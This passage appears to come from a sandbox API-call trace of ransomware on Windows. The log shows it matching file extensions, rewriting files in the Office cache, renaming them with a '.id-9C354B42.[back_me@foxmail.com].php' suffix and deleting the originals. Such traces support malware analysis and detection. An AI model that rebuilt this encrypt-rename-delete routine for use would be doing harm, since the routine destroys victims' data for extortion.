(lpString=".xls") returned 4 [0046.531] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.531] lstrlenW (lpString=".xlsx") returned 5 [0046.531] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0046.531] lstrlenW (lpString=".ppt") returned 4 [0046.531] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0046.531] lstrlenW (lpString=".zip") returned 4 [0046.531] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.531] lstrlenW (lpString=".rar") returned 4 [0046.531] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.531] lstrlenW (lpString=".bz2") returned 4 [0046.531] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.531] lstrlenW (lpString=".7z") returned 3 [0046.531] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0046.531] lstrlenW (lpString=".dbf") returned 4 [0046.531] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0046.531] lstrlenW (lpString=".1cd") returned 4 [0046.531] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0046.531] lstrlenW (lpString=".jpg") returned 4 [0046.531] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.531] lstrcmpiW (lpString1=".exe", lpString2=".php") returned -1 [0046.531] lstrlenW (lpString="dwtrig20.exe") returned 12 [0046.531] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0046.532] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=519584) returned 1 [0046.532] CloseHandle (hObject=0x1e8) returned 1 [0046.532] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe")) returned 0x2020 [0046.532] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.532] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0046.532] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.532] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.532] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0046.532] GetLastError () returned 0x0 [0046.533] ReadFile (in: hFile=0x1e8, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x7eda0, lpOverlapped=0x0) returned 1 [0046.747] WriteFile (in: hFile=0x210, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x7edb0, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x7edb0, lpOverlapped=0x0) returned 1 [0046.757] ReadFile (in: hFile=0x1e8, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.757] WriteFile (in: hFile=0x210, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.757] SetEndOfFile (hFile=0x210) returned 1 [0047.029] CloseHandle (hObject=0x210) returned 1 [0047.161] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.161] SetEndOfFile (hFile=0x1e8) returned 1 [0047.165] CloseHandle (hObject=0x1e8) returned 1 [0047.165] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0047.165] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe")) returned 1 [0047.165] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.165] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.165] lstrlenW (lpString=".doc") returned 4 [0047.165] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0047.165] lstrlenW (lpString=".docx") returned 5 [0047.165] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1 [0047.165] lstrlenW (lpString=".pdf") returned 4 [0047.165] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0047.165] lstrlenW (lpString=".xls") returned 4 [0047.165] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0047.165] lstrlenW (lpString=".xlsx") returned 5 [0047.165] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1 [0047.165] lstrlenW (lpString=".ppt") returned 4 [0047.165] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0047.165] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.165] lstrlenW (lpString=".zip") returned 4 [0047.165] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0047.166] lstrlenW (lpString=".rar") returned 4 [0047.166] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0047.166] lstrlenW (lpString=".bz2") returned 4 [0047.166] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0047.166] lstrlenW (lpString=".7z") returned 3 [0047.166] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0047.166] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.166] lstrlenW (lpString=".dbf") returned 4 [0047.166] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0047.166] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.166] lstrlenW (lpString=".1cd") returned 4 [0047.166] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0047.166] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.166] lstrlenW (lpString=".jpg") returned 4 [0047.166] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0047.166] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.166] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.166] lstrlenW (lpString=".doc") returned 4 [0047.166] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0047.166] lstrlenW (lpString=".docx") returned 5 [0047.166] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1 [0047.166] lstrlenW (lpString=".pdf") returned 4 [0047.166] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0047.166] lstrlenW (lpString=".xls") returned 4 [0047.166] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0047.166] lstrlenW (lpString=".xlsx") returned 5 [0047.166] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1 [0047.166] lstrlenW (lpString=".ppt") returned 4 [0047.166] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0047.166] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.166] lstrlenW (lpString=".zip") returned 4 [0047.166] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0047.166] lstrlenW (lpString=".rar") returned 4 [0047.167] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0047.167] lstrlenW (lpString=".bz2") returned 4 [0047.167] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0047.167] lstrlenW (lpString=".7z") returned 3 [0047.167] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0047.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.167] lstrlenW (lpString=".dbf") returned 4 [0047.167] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0047.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.167] lstrlenW (lpString=".1cd") returned 4 [0047.167] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0047.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0047.167] lstrlenW (lpString=".jpg") returned 4 [0047.167] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0047.167] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0047.167] lstrlenW (lpString="OfficeMUI.msi") returned 13 [0047.167] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0047.167] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=3702272) returned 1 [0047.167] CloseHandle (hObject=0x1e8) returned 1 [0047.168] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi")) returned 0x2020 [0047.168] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.168] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0047.168] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0047.168] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.168] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.168] ReadFile (in: hFile=0x1e8, lpBuffer=0x44e0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x44e0058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.173] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x12d4aa, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.173] ReadFile (in: hFile=0x1e8, lpBuffer=0x4520058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4520058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.527] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.527] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x347e00, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.527] ReadFile (in: hFile=0x1e8, lpBuffer=0x4560058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4560058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.607] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.607] WriteFile (in: hFile=0x1e8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x3d5fcb0, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0047.766] SetEndOfFile (hFile=0x1e8) returned 1 [0047.767] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42bc928 [0047.770] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.770] WriteFile (in: hFile=0x1e8, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.820] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x12d4aa, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.820] WriteFile (in: hFile=0x1e8, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.824] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x347e00, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.824] WriteFile (in: hFile=0x1e8, lpBuffer=0x42bc928*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bc928*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.826] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42bc928 | out: hHeap=0xb10000) returned 1 [0047.830] CloseHandle (hObject=0x1e8) returned 1 [0047.830] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0047.830] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.830] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.830] lstrlenW (lpString=".doc") returned 4 [0047.830] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.830] lstrlenW (lpString=".docx") returned 5 [0047.830] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0047.830] lstrlenW (lpString=".pdf") returned 4 [0047.830] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.830] lstrlenW (lpString=".xls") returned 4 [0047.830] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.831] lstrlenW (lpString=".xlsx") returned 5 [0047.831] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0047.831] lstrlenW (lpString=".ppt") returned 4 [0047.831] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.831] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.831] lstrlenW (lpString=".zip") returned 4 [0047.831] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.831] lstrlenW (lpString=".rar") returned 4 [0047.831] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.831] lstrlenW (lpString=".bz2") returned 4 [0047.831] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.831] lstrlenW (lpString=".7z") returned 3 [0047.831] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.831] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.831] lstrlenW (lpString=".dbf") returned 4 [0047.831] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.831] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.831] lstrlenW (lpString=".1cd") returned 4 [0047.831] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.831] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.831] lstrlenW (lpString=".jpg") returned 4 [0047.831] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.831] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.831] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.831] lstrlenW (lpString=".doc") returned 4 [0047.831] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.832] lstrlenW (lpString=".docx") returned 5 [0047.832] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0047.832] lstrlenW (lpString=".pdf") returned 4 [0047.832] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.832] lstrlenW (lpString=".xls") returned 4 [0047.832] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.832] lstrlenW (lpString=".xlsx") returned 5 [0047.832] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0047.832] lstrlenW (lpString=".ppt") returned 4 [0047.832] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.832] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.832] lstrlenW (lpString=".zip") returned 4 [0047.832] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.832] lstrlenW (lpString=".rar") returned 4 [0047.832] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.832] lstrlenW (lpString=".bz2") returned 4 [0047.832] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.832] lstrlenW (lpString=".7z") returned 3 [0047.832] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.832] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.832] lstrlenW (lpString=".dbf") returned 4 [0047.832] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.832] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.832] lstrlenW (lpString=".1cd") returned 4 [0047.832] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.832] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 [0047.832] lstrlenW (lpString=".jpg") returned 4 [0047.832] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.832] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0047.833] lstrlenW (lpString="Office32WW.msi") returned 14 [0047.833] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0047.833] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=1992192) returned 1 [0047.833] CloseHandle (hObject=0x1e8) returned 1 [0047.833] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0047.833] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.833] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0047.834] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0047.834] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.834] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.834] ReadFile (in: hFile=0x1e8, lpBuffer=0x44e0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x44e0058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.887] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.887] ReadFile (in: hFile=0x1e8, lpBuffer=0x4520058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4520058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.890] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.890] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.890] ReadFile (in: hFile=0x1e8, lpBuffer=0x4560058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4560058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.918] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.918] WriteFile (in: hFile=0x1e8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x3d5fcb0, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0048.173] SetEndOfFile (hFile=0x1e8) returned 1 [0048.174] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0048.178] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.178] WriteFile (in: hFile=0x1e8, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.180] 